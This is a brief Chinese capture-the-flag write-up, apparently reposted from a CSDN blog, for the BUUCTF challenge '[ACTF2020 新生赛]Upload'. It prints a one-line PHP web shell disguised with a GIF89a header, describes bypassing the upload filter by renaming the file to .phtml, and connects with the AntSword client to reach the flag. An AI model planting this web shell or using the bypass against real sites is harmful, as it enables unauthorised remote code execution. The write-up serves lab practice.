其他分享
首页 > 其他分享> > buu [ACTF2020 新生赛]Upload

buu [ACTF2020 新生赛]Upload

作者:互联网

构造test.php(一句话木马),内容如下

GIF89a<script language="php">eval($_POST['shell']);</script>
抓包上传,将文件后缀改为phtml,上传成功,并且返回了相应的文件名称

在这里插入图片描述
再用中国蚁剑链接,查找目录

在这里插入图片描述可得flag

标签:ACTF2020,phtml,Upload,buu,GIF89aeval,test,文件名称,上传
来源: https://blog.csdn.net/m0_53314778/article/details/117430603